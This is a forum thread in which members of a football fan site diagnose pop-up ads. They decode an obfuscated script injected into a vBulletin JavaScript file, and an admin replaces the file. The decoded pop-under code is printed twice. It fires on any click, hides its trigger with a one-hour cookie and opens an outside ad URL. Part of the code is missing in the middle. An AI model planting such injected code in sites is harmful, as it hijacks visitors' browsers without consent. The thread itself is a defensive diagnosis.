I keep Getting a Pop Up ad on NSC

[Jimmy Come Lately]

Yes, it's definitely the chunk of javascript at the end of vbulleting_read_marker.js that starts "eval function(p,a,c,k,e,t)". Running that function to deobfuscate the embedded code gives another blob of obfuscated code that uses the same function to unpack it. So running it through the function again I finally get this...

function PopShow3(){
	CookieTest=navigator.cookieEnabled;
	if(CookieTest){
		ClickUndercookie=GetCookie('clickunder');
		if(ClickUndercookie==null){
			var ExpDate=new Date();
			ExpDate.setTime(ExpDate.getTime()+(1*60*60*1000));
			SetCookie('clickunder','1',ExpDate,"/");
			var wnd=window.open("javascript:location.href='http://lsuebackupsite.newweb4gadget.com/images/https.php';","PopWin3","width=800,height=600,resizable=1,toolbar=1,location=1,menubar=1,status=1,scrollbars=1'");wnd.blur()
		}
	}
}
function GetCookie(name){
	var arg=name+"=";
	var alen=arg.length;
	var clen=document.cookie.length;
	var i=0;
	while(i2)?argv[2]:null;
	var path=(argc>3)?argv[3]:null;
	var domain=(argc>4)?argv[4]:null;
	var secure=(argc>5)?argv[5]:false;
	document.cookie=name+"="+escape(value)+((expires==null)?"":("; expires="+expires.toGMTString()))+((path==null)?"":("; path="+path))+((domain==null)?"":("; domain="+domain))+((secure==true)?"; secure":"")
}
document.onmouseup=PopShow3;

The last line explains why people have got the popups from different actions: it will trigger after a mouseclick anywhere on the page. And the cookie manipulation explains why we don't get it all the time, and it seems most likely on the first click after opening NSC: it sets a cookie that lasts for an hour and doesn't show the popup again until it has expired, so it will only trigger once an hour.

Slightly sneaky stuff to make the trigger for the popup seem random, and not so intrusive that the site becomes unusable. But ultimately just a popup. I suspect the lsuebackupsite URL then redirects to a random ad.

 

[Albumen]

Yes, it's definitely the chunk of javascript at the end of vbulleting_read_marker.js that starts "eval function(p,a,c,k,e,t)". Running that function to deobfuscate the embedded code gives another blob of obfuscated code that uses the same function to unpack it. So running it through the function again I finally get this...

function PopShow3(){
	CookieTest=navigator.cookieEnabled;
	if(CookieTest){
		ClickUndercookie=GetCookie('clickunder');
		if(ClickUndercookie==null){
			var ExpDate=new Date();
			ExpDate.setTime(ExpDate.getTime()+(1*60*60*1000));
			SetCookie('clickunder','1',ExpDate,"/");
			var wnd=window.open("javascript:location.href='http://lsuebackupsite.newweb4gadget.com/images/https.php';","PopWin3","width=800,height=600,resizable=1,toolbar=1,location=1,menubar=1,status=1,scrollbars=1'");wnd.blur()
		}
	}
}
function GetCookie(name){
	var arg=name+"=";
	var alen=arg.length;
	var clen=document.cookie.length;
	var i=0;
	while(i2)?argv[2]:null;
	var path=(argc>3)?argv[3]:null;
	var domain=(argc>4)?argv[4]:null;
	var secure=(argc>5)?argv[5]:false;
	document.cookie=name+"="+escape(value)+((expires==null)?"":("; expires="+expires.toGMTString()))+((path==null)?"":("; path="+path))+((domain==null)?"":("; domain="+domain))+((secure==true)?"; secure":"")
}
document.onmouseup=PopShow3;

The last line explains why people have got the popups from different actions: it will trigger after a mouseclick anywhere on the page. And the cookie manipulation explains why we don't get it all the time, and it seems most likely on the first click after opening NSC: it sets a cookie that lasts for an hour and doesn't show the popup again until it has expired, so it will only trigger once an hour.

Slightly sneaky stuff to make the trigger for the popup seem random, and not so intrusive that the site becomes unusable. But ultimately just a popup. I suspect the lsuebackupsite URL then redirects to a random ad.

This.

 

[Bozza]

Thanks Jimmy Come Lately.

I'd started work on this, this morning but had to dash out to run a few errands. When i got back, my next task was to upload some replacement files and vbulletin_read_marker.js was one of those files.

I'm working through the files now, one by one, and vbulletin_read_marker.js has already been replaced.

 

[Cheshire Cat]

Where's my pop-up gone

 

[seagulls4ever]

Avast is blocking some apparently nasty pop-ups originating from this site.

http://www.avast.com/en-gb/lp-fr-vi...89&p_hid=584c8486-4cf2-483d-b3f9-f684427c1c86

 

[SIMMO SAYS]

As a complete plank when it comes to all this stuff I have just gone on NSC and got that yanky bird again trying to sell me stuff?
I understand Bozza has got his hands full so good luck to him if he can sort this shi# out.
At least I'm not getting smutty stuff at the mo which was hard to explain to my 13 year old on Friday.
Although its probably lurking about still.

 

[Bozza]

I'm 99.9% sure it has been fixed.

However, your browser may have cached an old version of the bad file, which means you may still get pop-ups. To stop this, clear your browser history for all NSC stuff and you should find you don't get pop-ups any more.

 

[Acker79]

I haven't had a pop up since before your last post, so seems fine to me (touch wood). Thanks!

 

[The Oldman]

Still getting pop ups on chrome though thankfully being blocked by avast. Seems to happen after I log onto NSC and then click a thread

 

[Bozza]

Still getting pop ups on chrome though thankfully being blocked by avast. Seems to happen after I log onto NSC and then click a thread

Your browser has a cached version of a bad file - clear your history/cache for NSC and you'll be good.

 

[The Oldman]

Your browser has a cached version of a bad file - clear your history/cache for NSC and you'll be good.

Will do. TVM Bozza

 

[Garage_Doors]

When on the IPad when selection topics to read it opens a second tab to a advertising page offering loads of money to work form home, is this the same thing you guys are talking about?

 

[Tricky Dicky]

When on the IPad when selection topics to read it opens a second tab to a advertising page offering loads of money to work form home, is this the same thing you guys are talking about?

I reckon so, I'm getting that too on my pad ..... Plus NSC is incredibly slow when typing, about one char per second.

 

[Tricky Dicky]

... Plus the double post thang.

 

[surlyseagull]

Ditto ,me too .

 

[Acker79]

When on the IPad when selection topics to read it opens a second tab to a advertising page offering loads of money to work form home, is this the same thing you guys are talking about?

Yeah, but it will be the same issue as above. Clear your cache/history and it should stop happening.

I reckon so, I'm getting that too on my pad ..... Plus NSC is incredibly slow when typing, about one char per second.

I've got that too, I think it's related to the snow. Another poster in this thread has commented about the snow using up his CPU.

... Plus the double post thang.

If you get taken to a "This forum limits you from posting more than once in 60 seconds" or whatever page, just click away from it and you'll find you've already posted that post (or that seems to be the case with me).

 

[The Oldman]

Yeah, but it will be the same issue as above. Clear your cache/history and it should stop happening.



I've got that too, I think it's related to the snow. Another poster in this thread has commented about the snow using up his CPU.



If you get taken to a "This forum limits you from posting more than once in 60 seconds" or whatever page, just click away from it and you'll find you've already posted that post (or that seems to be the case with me).

Agree with that advice. works for me too but NSC is very snow slow

 

[SIMMO SAYS]

I think Bozza has sorted it:guitar:

 

[Garage_Doors]

How do you Clear your cache/history on a ipad?

Know how to do it on a PC but not apple.

 

[Bozza]

Double posts seemed to start, again, with the re-introduction of the notification/user tagging modification.

The snow does seem to be causing people issues though, so I'll remove it and try and find a less intensive script.